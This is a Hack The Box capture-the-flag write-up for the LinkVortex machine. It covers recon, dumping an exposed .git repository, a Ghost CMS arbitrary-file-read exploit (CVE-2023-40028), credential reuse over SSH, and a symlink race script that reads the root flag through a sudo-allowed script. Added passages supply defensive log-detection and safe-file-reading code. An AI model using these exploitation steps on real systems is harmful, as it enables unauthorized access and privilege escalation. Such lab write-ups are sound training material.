HACKTHEBOX - LinkVortex WriteUp
Author: Alvin Dhiyaul H
Reconnaissance
Port scanning with Nmap to find out which services are running on the server.
# Nmap 7.95 scan initiated Mon Dec 9 08:10:10 2024 as: nmap -sC -sV -o nmap 10.10.11.47
Nmap scan report for 10.10.11.47
Host is up (0.052s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
|_ 256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
80/tcp open http Apache httpd
|_http-title: Did not follow redirect to http://linkvortex.htb/
|_http-server-header: Apache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 9 08:10:31 2024 -- 1 IP address (1 host up) scanned in 21.03 seconds
From the information above we can see that a web service is running on port 80 with the hostname linkvortex.htb. To be able to reach that web service we first have to add the hostname to the /etc/hosts file.
echo "10.10.11.47 linkvortex.htb" | sudo tee -a /etc/hosts
After adding the hostname we can continue with enumeration of the subdomains present on the server using ffuf.
alvin@0xOff LinkVortex % ffuf -u http://linkvortex.htb -H "Host: FUZZ.linkvortex.htb" -w /Users/alvin/Documents/TOOLS/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt -c -t 64 -fs 230
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://linkvortex.htb
:: Wordlist : FUZZ: /Users/alvin/Documents/TOOLS/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.linkvortex.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 64
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 230
________________________________________________
dev [Status: 200, Size: 2538, Words: 670, Lines: 116, Duration: 83ms]
:: Progress: [114441/114441] :: Job [1/1] :: 3 req/sec :: Duration: [0:02:58] :: Errors: 0 ::
The subdomain enumeration reveals a subdomain dev.linkvortex.htb. Next we can run directory fuzzing against dev.linkvortex.htb with Dirsearch to look for sensitive information on that subdomain.
alvin@0xOff LinkVortex % dirsearch -u http://dev.linkvortex.htb --include-status 200
dirsearch v0.4.3.post1
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /Users/alvin/Documents/HACKTHEBOX/Easy/LinkVortex/reports/http_dev.linkvortex.htb/_24-12-09_22-54-05.txt
Target: http://dev.linkvortex.htb/
[22:54:05] Starting:
[22:54:09] 200 - 557B - /.git/
[22:54:09] 200 - 73B - /.git/description
[22:54:09] 200 - 201B - /.git/config
[22:54:09] 200 - 41B - /.git/HEAD
[22:54:09] 200 - 620B - /.git/hooks/
[22:54:09] 200 - 402B - /.git/info/
[22:54:09] 200 - 240B - /.git/info/exclude
[22:54:09] 200 - 175B - /.git/logs/HEAD
[22:54:09] 200 - 401B - /.git/logs/
[22:54:09] 200 - 147B - /.git/packed-refs
[22:54:09] 200 - 418B - /.git/objects/
[22:54:09] 200 - 393B - /.git/refs/
[22:54:10] 200 - 691KB - /.git/index
Task Completed
The fuzzing shows that the site has a vulnerability, CWE-527: Exposure of Version-Control Repository to an Unauthorized Control Sphere.
We can then dump the entire contents of the /.git directory with git-dumper to take a closer look at what sensitive information it holds.
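From the defender's side, the same finding shows up in the web server's access log as a run of successful requests into /.git/. The following is an added example (not part of the original write-up): it parses Apache combined-format log lines, which are constructed here, and reports which clients were actually served repository files, ignoring probes the server already blocked.

```python
import re
from collections import defaultdict

# Apache "combined" access-log line: client, timestamp, request, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Any request into the repository metadata directory itself.
GIT_PATH_RE = re.compile(r'^/\.git(/|$)')

# Constructed sample lines (not from the target): one client walking .git with
# success, one normal visitor, and one client whose .git probe was blocked.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Dec/2024:22:54:09 +0000] "GET /.git/HEAD HTTP/1.1" 200 41
10.0.0.5 - - [09/Dec/2024:22:54:09 +0000] "GET /.git/config HTTP/1.1" 200 201
10.0.0.5 - - [09/Dec/2024:22:54:10 +0000] "GET /.git/index HTTP/1.1" 200 707584
10.0.0.9 - - [09/Dec/2024:22:55:01 +0000] "GET /index.html HTTP/1.1" 200 2538
10.0.0.9 - - [09/Dec/2024:22:55:02 +0000] "GET /.git/HEAD HTTP/1.1" 404 196
"""

def parse_line(line):
    """Return the fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_git_exposure(log_text):
    """Map client IP -> list of /.git paths that were served with a 2xx status.

    A 404 or 403 means the directory is already blocked; only a 2xx proves the
    repository is really exposed (CWE-527) and that someone has started
    pulling it.
    """
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and GIT_PATH_RE.match(rec["path"]) and rec["status"][0] == "2":
            hits[rec["ip"]].append(rec["path"])
    return dict(hits)

# Besides keeping .git out of the document root, Apache 2.4 can deny the
# directory outright so every such request becomes a 403:
#   <DirectoryMatch "/\.git">
#       Require all denied
#   </DirectoryMatch>
```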
alvin@0xOff LinkVortex % git-dumper http://dev.linkvortex.htb/.git Linkvortexgit
[-] Testing http://dev.linkvortex.htb/.git/HEAD [200]
[-] Testing http://dev.linkvortex.htb/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://dev.linkvortex.htb/.gitignore [404]
[-] http://dev.linkvortex.htb/.gitignore responded with status code 404
[-] Fetching http://dev.linkvortex.htb/.git/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/refs/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/packed-refs [200]
[-] Fetching http://dev.linkvortex.htb/.git/shallow [200]
[-] Fetching http://dev.linkvortex.htb/.git/description [200]
[-] Fetching http://dev.linkvortex.htb/.git/logs/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/index [200]
[-] Fetching http://dev.linkvortex.htb/.git/HEAD [200]
[-] Fetching http://dev.linkvortex.htb/.git/config [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/info/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/refs/tags/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/logs/HEAD [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/commit-msg.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/pre-merge-commit.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/fsmonitor-watchman.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/pre-commit.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/post-update.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/pre-push.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/pre-receive.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/push-to-checkout.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/50/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/hooks/update.sample [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/e6/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/pack/ [200]
[-] Fetching http://dev.linkvortex.htb/.git/info/exclude [200]
[-] Fetching http://dev.linkvortex.htb/.git/refs/tags/v5.57.3 [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/50/864e0261278525197724b394ed4292414d9fec [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/e6/54b0ed7f9c9aedf3180ee1fd94e7e43b29f000 [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/pack/pack-0b802d170fe45db10157bb8e02bfc9397d5e9d87.pack [200]
[-] Fetching http://dev.linkvortex.htb/.git/objects/pack/pack-0b802d170fe45db10157bb8e02bfc9397d5e9d87.idx [200]
[-] Running git checkout .
After dumping the contents of the .git directory, I found that the running web service uses the Ghost Content Management System (CMS), version 5.58.0.
alvin@0xOff LinkVortex % ls Linkvortexgit
Dockerfile.ghost LICENSE PRIVACY.md README.md SECURITY.md apps ghost nx.json package.json yarn.lock
alvin@0xOff LinkVortex % cat Linkvortexgit/Dockerfile.ghost
FROM ghost:5.58.0
# Copy the config
COPY config.production.json /var/lib/ghost/config.production.json
# Prevent installing packages
RUN rm -rf /var/lib/apt/lists/* /etc/apt/sources.list* /usr/bin/apt-get /usr/bin/apt /usr/bin/dpkg /usr/sbin/dpkg /usr/bin/dpkg-deb /usr/sbin/dpkg-deb
# Wait for the db to be ready first
COPY wait-for-it.sh /var/lib/ghost/wait-for-it.sh
COPY entry.sh /entry.sh
RUN chmod +x /var/lib/ghost/wait-for-it.sh
RUN chmod +x /entry.sh
ENTRYPOINT ["/entry.sh"]
CMD ["node", "current/index.js"]
Expanding The Attack Surface
NOTE
Ghost CMS version 5.58.0 has a vulnerability identified as CVE-2023-40028. It allows an authenticated user to upload a symlink, which can be exploited as an arbitrary file read.
Besides the CMS and its version, I also found a password credential in a JS file at /ghost/core/test/regression/api/admin/authentication.test.js.
alvin@0xOff LinkVortex % cat Linkvortexgit/ghost/core/test/regression/api/admin/authentication.test.js | grep password
const password = 'OctopiFociPilfer45';
password,
await agent.loginAs(email, password);
password: 'thisissupersafe',
password: 'thisissupersafe',
const password = 'thisissupersafe';
Initial Access
So we can use the following exploit script for CVE-2023-40028 to obtain shell access.
alvin@0xOff LinkVortex % ./CVE-2023-40028.sh -u admin@linkvortex.htb -p OctopiFociPilfer45
WELCOME TO THE CVE-2023-40028 SHELL
file>
Recall that when we opened the Docker configuration file (Dockerfile.ghost), there was a line that copies the production configuration file, config.production.json, into the container.
# Copy the config
COPY config.production.json /var/lib/ghost/config.production.json
So we can read that file through the arbitrary file read in the shell we obtained earlier.
alvin@0xOff LinkVortex % ./CVE-2023-40028.sh -u admin@linkvortex.htb -p OctopiFociPilfer45
WELCOME TO THE CVE-2023-40028 SHELL
file> /var/lib/ghost/config.production.json
"mail": {
"transport": "SMTP",
"options": {
"service": "Google",
"host": "linkvortex.htb",
"port": 587,
"auth": {
"user": "bob@linkvortex.htb",
"pass": "fibber-talented-worth"
}
}
}
From the contents of config.production.json we obtain a username and password that we can use for remote access over SSH.
Foothold
We can then access the server over SSH using the credentials found earlier.
alvin@0xOff LinkVortex % ssh bob@linkvortex.htb
bob@linkvortex.htb's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.5.0-27-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Dec 9 16:34:05 2024 from 10.10.14.112
bob@linkvortex:~$
Getting user flag
We have now obtained the user flag.
bob@linkvortex:~$ whoami
bob
bob@linkvortex:~$ cat user.txt
be53f3*****************b60a51
bob@linkvortex:~$
Privilege Escalation to Root Access
Running sudo -l shows the following:
bob@linkvortex:~$ sudo -l
Matching Defaults entries for bob on linkvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, env_keep+=CHECK_CONTENT
User bob may run the following commands on linkvortex:
(ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png
The file clean_symlink.sh contains the following script.
bob@linkvortex:~$ cat /opt/ghost/clean_symlink.sh
#!/bin/bash
QUAR_DIR="/var/quarantined"
if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi
LINK=$1
if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi
if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi
NOTE
The user bob can run the script /opt/ghost/clean_symlink.sh with sudo and without a password, with the argument restricted only by the wildcard *.png. If the script does not validate its input properly, this wildcard can be manipulated to inject malicious commands or to exploit root privileges through a weakness in the script.
So we can write a simple script like the one below to grab the root.txt flag.
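Both weaknesses on this box, a symlink accepted where a regular file was expected (the Ghost upload, CVE-2023-40028) and a script that inspects a link target with readlink and only later reads through the path as root (clean_symlink.sh, defeated above by re-pointing the link between the two steps), have the same defensive fix: refuse symlinks and decide on the opened file descriptor rather than on the path. This is an added example in Python, not Ghost's or the box's code; the directory and file names are constructed.

```python
import errno
import os
import stat
import tempfile

def resolves_inside(path, root):
    """True only if the fully resolved path stays under root (advisory check)."""
    real_root = os.path.realpath(root)
    return os.path.commonpath([os.path.realpath(path), real_root]) == real_root

def read_regular_file(path, allowed_root):
    """Read path only if it is a regular file, not a symlink, inside allowed_root.

    The decisive check is made on the opened descriptor (O_NOFOLLOW + fstat),
    so a link swapped in after the path was inspected cannot redirect the read.
    """
    if not resolves_inside(path, allowed_root):
        raise PermissionError(f"{path} resolves outside {allowed_root}")
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_CLOEXEC)
    except OSError as exc:
        if exc.errno in (errno.ELOOP, errno.EMLINK):  # final component is a symlink
            raise PermissionError(f"{path} is a symlink, refusing to follow") from exc
        raise
    with os.fdopen(fd, "rb") as fh:
        if not stat.S_ISREG(os.fstat(fh.fileno()).st_mode):
            raise PermissionError(f"{path} is not a regular file")
        return fh.read()

def demo():
    """Constructed scenario (not from the target): an upload root holding one real
    file, one symlink to a file outside the root and one symlink to a file inside."""
    root, outside = tempfile.mkdtemp(), tempfile.mkdtemp()
    with open(os.path.join(root, "ok.png"), "wb") as fh:
        fh.write(b"\x89PNG constructed")
    with open(os.path.join(outside, "secret.txt"), "wb") as fh:
        fh.write(b"constructed secret")
    os.symlink(os.path.join(outside, "secret.txt"), os.path.join(root, "evil.png"))
    os.symlink(os.path.join(root, "ok.png"), os.path.join(root, "inner.png"))
    results = {}
    for name in ("ok.png", "evil.png", "inner.png"):
        try:
            results[name] = read_regular_file(os.path.join(root, name), root)
        except PermissionError:
            results[name] = "refused"
    return results
```

Applied to the sudo script, the equivalent would be to drop env_keep+=CHECK_CONTENT and to read the quarantined copy by descriptor after checking its type, instead of through the path that the caller still controls.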
#!/bin/bash
export CHECK_CONTENT=true
LINK="malicious_link.png"
ln -s /tmp/salom $LINK
sudo /usr/bin/bash /opt/ghost/clean_symlink.sh $LINK &
(sleep 0.03 && ln -sf /root/root.txt $LINK) &
Execute file & gain root flag
bob@linkvortex:~$ nano gain-root.sh
bob@linkvortex:~$ chmod +x gain-root.sh
bob@linkvortex:~$ ./gain-root.sh
bob@linkvortex:~$ Link found [ malicious_link.png ] , moving it to quarantine
Content:
b4b4****************1017
And we have successfully obtained the root flag on the server.